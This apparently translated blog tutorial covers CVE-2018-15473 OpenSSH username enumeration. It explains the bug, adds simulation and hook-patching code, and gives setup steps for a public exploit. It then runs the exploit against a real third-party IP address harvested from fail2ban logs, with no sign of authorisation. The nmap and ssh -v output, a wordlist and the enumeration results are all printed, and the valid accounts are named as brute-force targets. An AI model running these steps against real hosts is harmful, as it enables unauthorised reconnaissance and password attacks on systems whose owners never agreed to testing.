
User enumeration in OpenSSH, better known as CVE-2018-15473, is a vulnerability in OpenSSH versions up to and including 7.7 (fixed in 7.8) that lets an attacker enumerate usernames. It exists because the OpenSSH server handles an authentication request for a valid username differently from one for an invalid username, so an attacker can tell whether a given username exists on the target system.
How the vulnerability works. Description: CVE-2018-15473 occurs because sshd did not treat a malformed publickey authentication request consistently for existing and non-existent users. For a username that does not exist, sshd answers with SSH_MSG_USERAUTH_FAILURE without parsing the rest of the request; for a username that does exist, it goes on to parse the request, hits the malformed field and aborts the connection with fatal(). By sending such requests with different usernames, an attacker can find out which of them are valid.
Authentication process: when a client tries to log in over SSH, the server's reaction to the supplied username is observable. With an invalid username the server only reports that authentication failed, with no further detail; with a valid username and a malformed request it drops the connection instead of sending a failure message. That difference in behaviour is the leak.
Attack method: the attacker uses this difference to build a list of valid usernames. By trying many usernames and recording the server's reaction to each (failure message or dropped connection), they learn which usernames exist on the system.
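The exchange described above, modelled as an added example (not code from the post, and not OpenSSH's own code): a simulated sshd with the pre-7.8 and the post-7.8 handling of a malformed publickey SSH_MSG_USERAUTH_REQUEST, plus the client-side probe that turns the difference into a username oracle. The password database KNOWN_USERS, the two server functions and the way the request is malformed (a bogus length field, where the real exploit drops the have_sig byte) are constructed for the demonstration. Python 3.

```python
# Model of the sshd code path behind CVE-2018-15473 (auth2-pubkey.c,
# userauth_pubkey): OpenSSH <= 7.7 bails out for an unknown user before it
# has parsed the rest of the request, OpenSSH >= 7.8 parses first. Added
# example, not the post's code and not OpenSSH code; the "server" is a
# simulation. Packet layout follows RFC 4251/4252.
import struct

# Constructed stand-in for the server's password database (assumption).
KNOWN_USERS = {"root", "operator", "ftp"}

MSG_USERAUTH_FAILURE = "SSH_MSG_USERAUTH_FAILURE"


class ConnectionDropped(Exception):
    """Stands in for sshd's fatal(): the TCP connection is torn down."""


def ssh_string(data):
    """RFC 4251 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def parse_string(buf, off):
    """Read one RFC 4251 string at offset off; ValueError if truncated."""
    if off + 4 > len(buf):
        raise ValueError("truncated length field")
    (n,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    if off + n > len(buf):
        raise ValueError("truncated string body")
    return buf[off:off + n], off + n


def build_pubkey_request(user, malformed):
    """SSH_MSG_USERAUTH_REQUEST payload for method 'publickey' (RFC 4252 s.7).

    The real exploit omits the have_sig boolean so the server misparses what
    follows; here the key blob gets a length field far larger than the data
    that follows it, which fails parsing deterministically (assumption).
    """
    payload = (ssh_string(user.encode()) + ssh_string(b"ssh-connection") +
               ssh_string(b"publickey") + b"\x00" + ssh_string(b"ssh-rsa"))
    blob = b"\x00" * 16
    if malformed:
        return payload + struct.pack(">I", 0xFFFFFFFF) + blob
    return payload + ssh_string(blob)


def parse_pubkey_request(payload):
    """Full parse, as userauth_pubkey() does: have_sig, pkalg, pkblob."""
    user, off = parse_string(payload, 0)
    _service, off = parse_string(payload, off)
    _method, off = parse_string(payload, off)
    have_sig = payload[off]
    off += 1
    pkalg, off = parse_string(payload, off)
    blob, off = parse_string(payload, off)
    return user.decode(), have_sig, pkalg, blob


def vulnerable_sshd(payload):
    """OpenSSH <= 7.7: unknown user -> failure before the tail is parsed."""
    user, _ = parse_string(payload, 0)          # auth2.c always reads the user
    if user.decode() not in KNOWN_USERS:
        return MSG_USERAUTH_FAILURE             # malformed tail never looked at
    try:
        parse_pubkey_request(payload)
    except ValueError as exc:
        raise ConnectionDropped("fatal: parse request failed: %s" % exc)
    return MSG_USERAUTH_FAILURE                 # key not authorised: normal failure


def patched_sshd(payload):
    """OpenSSH >= 7.8: parse the whole request first, then judge the user."""
    try:
        parse_pubkey_request(payload)
    except ValueError as exc:
        raise ConnectionDropped("fatal: parse request failed: %s" % exc)
    return MSG_USERAUTH_FAILURE                 # same answer for any username


def probe(server, user):
    """Client side of the oracle: True if the server dropped the connection."""
    try:
        server(build_pubkey_request(user, malformed=True))
    except ConnectionDropped:
        return True
    return False


def enumerate_users(server, wordlist):
    """Return the usernames the oracle reports as present."""
    return [u for u in wordlist if probe(server, u)]


if __name__ == "__main__":
    wordlist = ["root", "admin", "operator", "ftp", "www-data"]
    print("vulnerable:", enumerate_users(vulnerable_sshd, wordlist))
    print("patched:   ", enumerate_users(patched_sshd, wordlist))
```

Against the vulnerable model the wordlist is filtered down to exactly the names in KNOWN_USERS; against the patched model every name, valid or not, causes the same dropped connection, so the whole wordlist comes back and nothing is learned. That is why a dropped connection, not a failure message, is what the exploit counts as "valid user".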
Just so you know, if you want to practise pentesting you can use the IP data from Alamat IP dan Vulnerable nya bagus untuk uji pentest, which I deliberately collected from fail2ban on my own VPS. CVE-2018-15473 is a very old vulnerability, so the public exploit needs a number of adjustments to run on current tooling.
We'll use Python 2.7 to run the script, which you get with git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git. I strongly recommend using a virtual environment (see Install Python 2.7 dan 3.8); with conda:
conda create -n py27 python=2.7
after running the command above, activate the environment:
conda activate py27
now change into the CVE-2018-15473-Exploit directory to install its modules:
cd CVE-2018-15473-Exploit
type the following to install the older paramiko version the script was written against:
pip install paramiko==2.4.2
Next, sshUsernameEnumExploit.py still refers to the old paramiko attribute name, so a small edit is needed. First check which name your installed paramiko uses: if running the script fails with an AttributeError on _handler_table, your release has split the table into _client_handler_table and _server_handler_table and you need the edit below; if it runs without that error, leave the script as it is.
old:
old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
replace with:
old_parse_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table.get( paramiko.common.MSG_SERVICE_ACCEPT )
then:
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error
replace with:
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error
then save the file.
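A version-tolerant way to do the same patch, as an added example (not part of the post and not the Rhynorater script): it installs the exploit's two hooks on whichever dispatch table the installed paramiko exposes, AuthHandler._handler_table or AuthHandler._client_handler_table, and hands back a restore function. OldParamikoAuthHandler and NewParamikoAuthHandler are constructed stand-ins for the two layouts so the code runs offline; in real use you pass paramiko.auth_handler.AuthHandler. The message numbers are the RFC 4252/4253 values that paramiko.common also uses. Python 3.

```python
# Added example: install the CVE-2018-15473 exploit hooks regardless of
# whether paramiko names its client dispatch dict _handler_table (older
# releases) or _client_handler_table (releases that split client/server
# tables). Not code from the post or from the Rhynorater repository.

MSG_SERVICE_ACCEPT = 6       # SSH_MSG_SERVICE_ACCEPT, RFC 4253
MSG_USERAUTH_FAILURE = 51    # SSH_MSG_USERAUTH_FAILURE, RFC 4252


def handler_table(auth_handler_cls):
    """Return the client-side dispatch dict, whichever name this paramiko uses."""
    for name in ("_client_handler_table", "_handler_table"):
        table = getattr(auth_handler_cls, name, None)
        if isinstance(table, dict):
            return table
    raise AttributeError("no handler table on %r: unsupported paramiko layout"
                         % (auth_handler_cls,))


def install_enum_hooks(auth_handler_cls, wrap_service_accept, call_error):
    """Patch the table in place and return a restore() that undoes it.

    wrap_service_accept(original) must return the replacement for the
    SERVICE_ACCEPT handler (the exploit wraps the original, which is why it
    is passed in); call_error replaces the USERAUTH_FAILURE handler.
    """
    table = handler_table(auth_handler_cls)
    saved = {key: table.get(key) for key in (MSG_SERVICE_ACCEPT, MSG_USERAUTH_FAILURE)}
    table[MSG_SERVICE_ACCEPT] = wrap_service_accept(saved[MSG_SERVICE_ACCEPT])
    table[MSG_USERAUTH_FAILURE] = call_error

    def restore():
        for key, original in saved.items():
            if original is None:
                table.pop(key, None)
            else:
                table[key] = original
    return restore


# --- constructed stand-ins for paramiko internals (not the real classes) ---
def _orig_service_accept(self, m):
    return "service-accept"


def _orig_userauth_failure(self, m):
    return "userauth-failure"


class OldParamikoAuthHandler:          # layout with a single _handler_table
    _handler_table = {MSG_SERVICE_ACCEPT: _orig_service_accept,
                      MSG_USERAUTH_FAILURE: _orig_userauth_failure}


class NewParamikoAuthHandler:          # layout with split client/server tables
    _client_handler_table = {MSG_SERVICE_ACCEPT: _orig_service_accept,
                             MSG_USERAUTH_FAILURE: _orig_userauth_failure}
    _server_handler_table = {}


class BadUsername(Exception):
    """Raised when the server answered USERAUTH_FAILURE: user does not exist."""


def call_error(*args, **kwargs):
    raise BadUsername()


def make_malform_packet(old_service_accept):
    """The exploit's wrapper: in the real script Message.add_boolean is
    suppressed around this call so the USERAUTH_REQUEST lacks have_sig."""
    def malform_packet(*args, **kwargs):
        return old_service_accept(*args, **kwargs)
    return malform_packet


def demo(auth_handler_cls):
    """Patch, dispatch both messages as paramiko would, restore, report."""
    restore = install_enum_hooks(auth_handler_cls, make_malform_packet, call_error)
    table = handler_table(auth_handler_cls)
    handler = auth_handler_cls()
    accepted = table[MSG_SERVICE_ACCEPT](handler, None)   # wrapper -> original
    try:
        table[MSG_USERAUTH_FAILURE](handler, None)
        raised = False
    except BadUsername:
        raised = True
    restore()
    restored = table[MSG_SERVICE_ACCEPT] is _orig_service_accept
    return accepted, raised, restored


if __name__ == "__main__":
    for cls in (OldParamikoAuthHandler, NewParamikoAuthHandler):
        print(cls.__name__, demo(cls))
```

Because the hooks live on the class, they affect every Transport in the process; the restore() closure matters if the same interpreter later needs a normal paramiko session.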
The script's usage is as follows:
usage: sshUsernameEnumExploit.py [-h] [--port PORT] [--threads THREADS] [--outputFile OUTPUTFILE] [--outputFormat {list,json,csv}] (--username USERNAME | --userList USERLIST) hostname
Hmm, interesting. Let's go straight to the data from Alamat IP dan Vulnerable nya bagus untuk uji pentest and look for entries that mention CVE-2018-15473, for example the IP 170.79.37.84.
Let's check the server version of that host:
nmap -sV -p 22 170.79.37.84
the result:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-04 20:14 WIB
Nmap scan report for ocweb.monitoreotdp.com.pe (170.79.37.84)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
or with the command
ssh -v 170.79.37.84
the result:
OpenSSH_8.6p1, LibreSSL 3.3.6
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 21: include /etc/ssh/ssh_config.d/* matched no files
debug1: /etc/ssh/ssh_config line 54: Applying options for *
debug1: /etc/ssh/ssh_config line 58: Applying options for *
debug1: Authenticator provider $SSH_SK_PROVIDER did not resolve; disabling
debug1: Connecting to 170.79.37.84 [170.79.37.84] port 22.
debug1: Connection established.
debug1: identity file /Users/user/.ssh/id_rsa type 0
debug1: identity file /Users/user/.ssh/id_rsa-cert type -1
debug1: identity file /Users/user/.ssh/id_dsa type -1
debug1: identity file /Users/user/.ssh/id_dsa-cert type -1
debug1: identity file /Users/user/.ssh/id_ecdsa type -1
debug1: identity file /Users/user/.ssh/id_ecdsa-cert type -1
debug1: identity file /Users/user/.ssh/id_ecdsa_sk type -1
debug1: identity file /Users/user/.ssh/id_ecdsa_sk-cert type -1
debug1: identity file /Users/user/.ssh/id_ed25519 type -1
debug1: identity file /Users/user/.ssh/id_ed25519-cert type -1
debug1: identity file /Users/user/.ssh/id_ed25519_sk type -1
debug1: identity file /Users/user/.ssh/id_ed25519_sk-cert type -1
debug1: identity file /Users/user/.ssh/id_xmss type -1
debug1: identity file /Users/user/.ssh/id_xmss-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.6
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.4
debug1: compat_banner: match: OpenSSH_7.4 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to 170.79.37.84:22 as 'user'
debug1: load_hostkeys: fopen /Users/user/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ssh-ed25519 SHA256:sV0glpPfZDtGxkXpzjiFuVUh5r0zNEyVCe+8IoMsuA0
debug1: load_hostkeys: fopen /Users/user/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: Host '170.79.37.84' is known and matches the ED25519 host key.
debug1: Found key in /Users/user/.ssh/known_hosts:10
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: Will attempt key: /Users/user/.ssh/id_rsa RSA SHA256:c8zOA+X6gpnEluPY2DJs1+LP1QkWuzg+rnsEEVKErdQ
debug1: Will attempt key: /Users/user/.ssh/id_dsa
debug1: Will attempt key: /Users/user/.ssh/id_ecdsa
debug1: Will attempt key: /Users/user/.ssh/id_ecdsa_sk
debug1: Will attempt key: /Users/user/.ssh/id_ed25519
debug1: Will attempt key: /Users/user/.ssh/id_ed25519_sk
debug1: Will attempt key: /Users/user/.ssh/id_xmss
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<rsa-sha2-256,rsa-sha2-512>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,gssapi-keyex,gssapi-with-mic,password
debug1: Next authentication method: publickey
debug1: Offering public key: /Users/user/.ssh/id_rsa RSA SHA256:c8zOA+X6gpnEluPY2DJs1+LP1QkWuzg+rnsEEVKErdQ
debug1: Authentications that can continue: publickey,gssapi-keyex,gssapi-with-mic,password
debug1: Trying private key: /Users/user/.ssh/id_dsa
debug1: Trying private key: /Users/user/.ssh/id_ecdsa
debug1: Trying private key: /Users/user/.ssh/id_ecdsa_sk
debug1: Trying private key: /Users/user/.ssh/id_ed25519
debug1: Trying private key: /Users/user/.ssh/id_ed25519_sk
debug1: Trying private key: /Users/user/.ssh/id_xmss
Note the two version strings, which are easy to confuse:
- nmap reports the server as OpenSSH 7.4 (protocol 2.0)
- in the ssh -v output the first line, OpenSSH_8.6p1, LibreSSL 3.3.6, is the local client; the server is identified by the line "remote software version OpenSSH_7.4"
So both tools agree that the target runs OpenSSH 7.4, which is inside the affected range (up to 7.7). Keep in mind that the banner is only a hint: distributions backport security fixes without changing the version number, so a 7.4 banner alone does not prove the host is vulnerable. The enumeration run itself is the confirmation.
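Reading those banners programmatically, as an added example that is not part of the post: it extracts the server's OpenSSH version from a raw banner or from ssh -v output (taking care to pick the "remote software version" line rather than the local client's first line), reports whether it falls in the range CVE-2018-15473 affects (up to 7.7, fixed in 7.8), and words the verdict so the backport caveat is not lost. The sample banners and the SSH_V_SAMPLE excerpt are constructed from the output shown above; grab_banner() is a real network call and is not exercised offline. Python 3.

```python
# Added example (not from the post): triage an SSH version banner for
# CVE-2018-15473. "In the affected range" means "worth testing", because
# vendor builds often carry a backported fix under the old version number.
import re
import socket

FIXED_IN = (7, 8)   # CVE-2018-15473 was fixed in OpenSSH 7.8

# Matches "SSH-2.0-OpenSSH_7.4", "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7", ...
BANNER_RE = re.compile(
    r"^SSH-(?P<proto>\d+\.\d+)-OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)"
    r"(?:p(?P<portable>\d+))?(?:[ -](?P<vendor>.+))?$"
)


def parse_openssh_version(software):
    """Parse an OpenSSH banner with or without the 'SSH-2.0-' prefix.

    Returns (major, minor, vendor_suffix_or_None), or None if it is not
    an OpenSSH banner (dropbear, libssh, Cisco, an unparseable string).
    """
    software = software.strip()
    if not software.startswith("SSH-"):
        software = "SSH-2.0-" + software
    m = BANNER_RE.match(software)
    if not m:
        return None
    vendor = (m.group("vendor") or "").strip() or None
    return int(m.group("major")), int(m.group("minor")), vendor


def in_affected_range(software):
    """True for OpenSSH <= 7.7, False for 7.8+, None if not OpenSSH."""
    parsed = parse_openssh_version(software)
    if parsed is None:
        return None
    return parsed[:2] < FIXED_IN


def triage(software):
    """Human-readable verdict; the wording carries the backport caveat."""
    parsed = parse_openssh_version(software)
    if parsed is None:
        return "unknown: not an OpenSSH banner"
    major, minor, vendor = parsed
    version = "OpenSSH %d.%d" % (major, minor)
    if (major, minor) >= FIXED_IN:
        return "%s: outside the affected range" % version
    note = " (vendor build %s)" % vendor if vendor else ""
    return "%s%s: in the affected range, test it (a backported fix is possible)" % (version, note)


def remote_and_local_from_ssh_v(debug_output):
    """Pull (server, client) software strings out of `ssh -v` output.

    The first line of that output is the local client; the server version
    is on the 'remote software version ...' line.
    """
    remote = re.search(r"remote software version (\S+)", debug_output)
    local = re.search(r"Local version string SSH-\d+\.\d+-(\S+)", debug_output)
    return (remote.group(1) if remote else None,
            local.group(1) if local else None)


def grab_banner(host, port=22, timeout=5.0):
    """Read the server identification string (RFC 4253 s.4.2) over TCP.

    Network call, not exercised offline. Servers may send other lines
    before the 'SSH-' line; those are skipped.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for _ in range(32):                     # guard against a silent server
            line = b""
            while not line.endswith(b"\n") and len(line) < 256:
                byte = sock.recv(1)
                if not byte:
                    return None
                line += byte
            if line.startswith(b"SSH-"):
                return line.decode("ascii", "replace").strip()
    return None


# Constructed excerpt of the ssh -v output shown above.
SSH_V_SAMPLE = """OpenSSH_8.6p1, LibreSSL 3.3.6
debug1: Local version string SSH-2.0-OpenSSH_8.6
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.4
"""

if __name__ == "__main__":
    server, client = remote_and_local_from_ssh_v(SSH_V_SAMPLE)
    print("client:", client, "->", triage(client))
    print("server:", server, "->", triage(server))
```

Pairing this with the actual enumeration run is the right workflow: the banner check decides whether a host is worth the connection attempts, and only a dropped connection for a known-good name (as in the run below) confirms the bug is really present.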
Now create a user list of usernames commonly used with SSH, one name per line, and save it as, say, user.txt:
root
admin
administrator
guest
user
test
ubuntu
debian
pi
support
info
backup
operator
dev
devops
sysadmin
postgres
mysql
oracle
ftp
ftpuser
web
webadmin
nginx
apache
www
www-data
jenkins
tomcat
git
gitlab
gituser
docker
build
ci
bot
ansible
vagrant
packer
kali
pentest
scanner
security
monitor
db
dbadmin
sql
sqladmin
hadoop
spark
zeppelin
airflow
elastic
logstash
kibana
splunk
graylog
grafana
influx
prometheus
zabbix
nagios
cacti
nmap
wireshark
wiresharkuser
snort
suricata
clamav
clamuser
mail
mailman
postfix
postmaster
sendmail
courier
dovecot
roundcube
zimbra
samba
winbind
kerberos
sshd
ssh
sshuser
nologin
nobody
games
cups
lp
lpd
print
proxy
bind
named
dns
dnsuser
ntp
time
mysqluser
mariadb
mongodb
mongo
redis
memcached
solr
wwwrun
lighttpd
lighty
webuser
php
phpuser
phpmyadmin
apache2
iis
nginxuser
cloud
clouduser
azure
aws
Now run the script, writing the results to out.txt:
python sshUsernameEnumExploit.py --userList user.txt --outputFile out.txt 170.79.37.84
the result:
[+] Results successfully written to out.txt in List form.
and out.txt contains:
root is a valid user!
admin is not a valid user!
administrator is not a valid user!
guest is not a valid user!
user is not a valid user!
test is not a valid user!
ubuntu is not a valid user!
debian is not a valid user!
pi is not a valid user!
support is not a valid user!
info is not a valid user!
backup is not a valid user!
operator is a valid user!
dev is not a valid user!
devops is not a valid user!
sysadmin is not a valid user!
postgres is not a valid user!
mysql is not a valid user!
oracle is not a valid user!
ftp is a valid user!
ftpuser is not a valid user!
web is not a valid user!
webadmin is not a valid user!
nginx is not a valid user!
apache is not a valid user!
www is not a valid user!
www-data is not a valid user!
jenkins is not a valid user!
tomcat is not a valid user!
git is not a valid user!
gitlab is not a valid user!
gituser is not a valid user!
docker is not a valid user!
build is not a valid user!
ci is not a valid user!
bot is not a valid user!
ansible is not a valid user!
vagrant is not a valid user!
packer is not a valid user!
kali is not a valid user!
pentest is not a valid user!
scanner is not a valid user!
security is not a valid user!
monitor is not a valid user!
db is not a valid user!
dbadmin is not a valid user!
sql is not a valid user!
sqladmin is not a valid user!
hadoop is not a valid user!
spark is not a valid user!
zeppelin is not a valid user!
airflow is not a valid user!
elastic is not a valid user!
logstash is not a valid user!
kibana is not a valid user!
splunk is not a valid user!
graylog is not a valid user!
grafana is not a valid user!
influx is not a valid user!
prometheus is not a valid user!
zabbix is not a valid user!
nagios is not a valid user!
cacti is not a valid user!
nmap is not a valid user!
wireshark is not a valid user!
wiresharkuser is not a valid user!
snort is not a valid user!
suricata is not a valid user!
clamav is not a valid user!
clamuser is not a valid user!
mail is a valid user!
mailman is not a valid user!
postfix is a valid user!
postmaster is not a valid user!
sendmail is not a valid user!
courier is not a valid user!
dovecot is not a valid user!
roundcube is not a valid user!
zimbra is not a valid user!
samba is not a valid user!
winbind is not a valid user!
kerberos is not a valid user!
sshd is a valid user!
ssh is not a valid user!
sshuser is not a valid user!
nologin is not a valid user!
nobody is a valid user!
games is a valid user!
cups is not a valid user!
lp is a valid user!
lpd is not a valid user!
print is not a valid user!
proxy is not a valid user!
bind is not a valid user!
named is not a valid user!
dns is not a valid user!
dnsuser is not a valid user!
ntp is not a valid user!
time is not a valid user!
mysqluser is not a valid user!
mariadb is not a valid user!
mongodb is not a valid user!
mongo is not a valid user!
redis is not a valid user!
memcached is not a valid user!
solr is not a valid user!
wwwrun is not a valid user!
lighttpd is not a valid user!
lighty is not a valid user!
webuser is not a valid user!
php is not a valid user!
phpuser is not a valid user!
phpmyadmin is not a valid user!
apache2 is not a valid user!
iis is not a valid user!
nginxuser is not a valid user!
cloud is not a valid user!
clouduser is not a valid user!
azure is not a valid user!
aws is not a valid user!
So the server is indeed vulnerable, and the enumeration found the following existing accounts (nine in the output above, including mail), which are the candidates for a password brute-force:
- root
- operator
- ftp
- mail
- postfix
- sshd
- nobody
- games
- lp
Note what "valid" means here: the account exists in the server's password database, not that it can log in over SSH. Most of the names found (sshd, nobody, games, lp, ftp, mail, postfix, operator) are standard system and service accounts that normally have a locked password and a nologin shell, and root may be restricted by PermitRootLogin. In practice root is the only interesting brute-force target in this list; the value of the technique is in confirming which names from a larger wordlist of human account names exist.
Below is the complete sshUsernameEnumExploit.py with the edits already applied, so you do not need to change anything yourself; log in to this blog first and the code will be shown.